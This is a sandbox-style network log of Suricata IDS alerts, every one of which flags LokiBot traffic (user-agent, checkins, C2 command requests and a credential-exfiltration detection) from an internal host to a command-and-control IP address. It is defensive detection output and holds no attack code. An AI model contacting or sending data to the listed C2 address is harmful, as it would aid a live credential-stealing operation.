Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49876 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49876 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49876 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49901 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49901 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49901 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49901 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49876 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49876 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49901 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49856 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49856 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49908 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49908 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49908 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49856 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49975 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49856 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49856 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49988 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49988 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49988 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49967 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49967 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49967 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49988 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49988 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49933 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49933 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49975 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49967 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49967 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50028 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50031 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50031 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49975 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50031 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50023 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50023 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50033 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50033 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50024 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50023 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49933 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50028 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50024 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50028 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50031 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50031 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50024 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50033 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50028 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50028 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49933 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49933 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50024 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50033 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50024 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50033 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.9:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50004 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49908 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49908 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49975 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49975 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50023 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50023 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50004 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50004 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49892 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49892 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49892 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49892 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49892 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50004 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50029 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50029 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50029 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50004 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50029 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50029 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50017 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50017 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50017 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50017 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50017 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50011 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50011 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50011 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50011 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50011 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50078 -> 94.156.177.41:80
